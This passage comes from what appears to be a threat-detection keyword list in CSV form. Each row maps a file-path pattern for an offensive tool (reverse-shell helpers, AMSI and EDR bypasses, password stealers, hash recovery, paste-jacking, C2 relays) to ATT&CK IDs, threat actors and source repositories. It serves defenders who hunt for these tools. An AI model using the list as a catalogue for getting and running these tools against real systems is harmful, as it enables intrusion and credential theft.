Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","9496" "*/PANIX.git*",".{0,1000}\/PANIX\.git.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 
- T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","9497" "*/panix.sh --*",".{0,1000}\/panix\.sh\s\-\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","9498" "*/papacat.bat",".{0,1000}\/papacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","9499" "*/papacat.ps1*",".{0,1000}\/papacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","9500" "*/papacat.zip*",".{0,1000}\/papacat\.zip.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","1","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","9501" "*/paranoidninja/*",".{0,1000}\/paranoidninja\/.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","N/A","10","10","193","66","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z","9502" "*/Parasite Invoke.exe*",".{0,1000}\/Parasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","9503" "*/Parasite%20Invoke.exe",".{0,1000}\/Parasite\%20Invoke\.exe","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","9504" "*/Parasite-Invoke.git*",".{0,1000}\/Parasite\-Invoke\.git.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","9505" "*/parrot/iso/*.iso*",".{0,1000}\/parrot\/iso\/.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9506" "*/parrot-mirror/*",".{0,1000}\/parrot\-mirror\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9507" "*/parrot-on-docker/*",".{0,1000}\/parrot\-on\-docker\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9508" "*/parrotsec/*",".{0,1000}\/parrotsec\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. 
security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9509" "*/ParsedMalleableData.txt*",".{0,1000}\/ParsedMalleableData\.txt.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","9510" "*/parsers/nessus.py*",".{0,1000}\/parsers\/nessus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9511" "*/pass_gen.pl*",".{0,1000}\/pass_gen\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","9512" "*/PassDetective.git*",".{0,1000}\/PassDetective\.git.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly 
written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","9513" "*/passhash.sl*",".{0,1000}\/passhash\.sl.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","9514" "*/passive_sqli.txt*",".{0,1000}\/passive_sqli\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","9515" "*/PassSpray.git*",".{0,1000}\/PassSpray\.git.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","1","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","9516" "*/PassSpray.ps1*",".{0,1000}\/PassSpray\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","9517" "*/PassSpray.ps1*",".{0,1000}\/PassSpray\.ps1.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","1","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","9518" "*/PassTheCert.exe*",".{0,1000}\/PassTheCert\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","9519" "*/PassTheCert.exe*",".{0,1000}\/PassTheCert\.exe.{0,1000}","offensive_tool_keyword","PassTheCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - 
T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9520" "*/PassTheCert.exe*",".{0,1000}\/PassTheCert\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9521" "*/PassTheCert.exe*",".{0,1000}\/PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9522" "*/PassTheCert.git*",".{0,1000}\/PassTheCert\.git.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","9523" "*/PassTheChallenge.git*",".{0,1000}\/PassTheChallenge\.git.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","9524" "*/PassTheChallenge/Constants.h*",".{0,1000}\/PassTheChallenge\/Constants\.h.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#linux","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","9525" "*/PassTheChallenge/Protocol_h.h*",".{0,1000}\/PassTheChallenge\/Protocol_h\.h.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - 
T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#linux","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","9526" "*/PassTheChallenge/releases/download/*",".{0,1000}\/PassTheChallenge\/releases\/download\/.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","9527" "*/passwd.py*",".{0,1000}\/passwd\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#linux","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9528" "*/passwd_tracer.c*",".{0,1000}\/passwd_tracer\.c.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","#linux","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","9529" "*/password.lst*",".{0,1000}\/password\.lst.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","9530" "*/password/mimipenguin/*",".{0,1000}\/password\/mimipenguin\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. 
CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","9531" "*/password_brute.txt*",".{0,1000}\/password_brute\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","9532" "*/password_cracker.py*",".{0,1000}\/password_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9533" "*/password_ruled.txt*",".{0,1000}\/password_ruled\.txt.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","9534" "*/password_sniffer.html*",".{0,1000}\/password_sniffer\.html.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","9535" "*/passwordcracker.Dockerfile*",".{0,1000}\/passwordcracker\.Dockerfile.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9536" "*/passwordcracker/*",".{0,1000}\/passwordcracker\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data 
enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9537" "*/Passwords.docx*",".{0,1000}\/Passwords\.docx.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","9538" "*/Passwords/Common-Credentials/10k-most-common.txt*",".{0,1000}\/Passwords\/Common\-Credentials\/10k\-most\-common\.txt.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","1","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","9539" "*/PasswordStealer.dll*",".{0,1000}\/PasswordStealer\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","9540" "*/pastehakk.git*",".{0,1000}\/pastehakk\.git.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - 
T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","1","N/A","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","9541" "*/pastehakk.sh*",".{0,1000}\/pastehakk\.sh.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","1","#linux","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","9542" "*/patch_amsi.exe*",".{0,1000}\/patch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9543" "*/Patch_AMSI.py*",".{0,1000}\/Patch_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","9544" "*/Patch_AMSI.vba*",".{0,1000}\/Patch_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","9545" "*/patch_etw.exe*",".{0,1000}\/patch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation 
tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9546" "*/patchfinder64.*",".{0,1000}\/patchfinder64\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9547" "*/PatchingAPI.cpp*",".{0,1000}\/PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","9548" "*/PatchingAPI.exe*",".{0,1000}\/PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub 
and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","9549" "*/path_traversal.txt*",".{0,1000}\/path_traversal\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","9550" "*/path_traversal_dict.txt*",".{0,1000}\/path_traversal_dict\.txt.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","1","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","9551" "*/path_traversal_win32.txt*",".{0,1000}\/path_traversal_win32\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","9552" "*/path-mtu.nse*",".{0,1000}\/path\-mtu\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9553" "*/payload.exe*",".{0,1000}\/payload\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9554" "*/payload.hta*",".{0,1000}\/payload\.hta.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
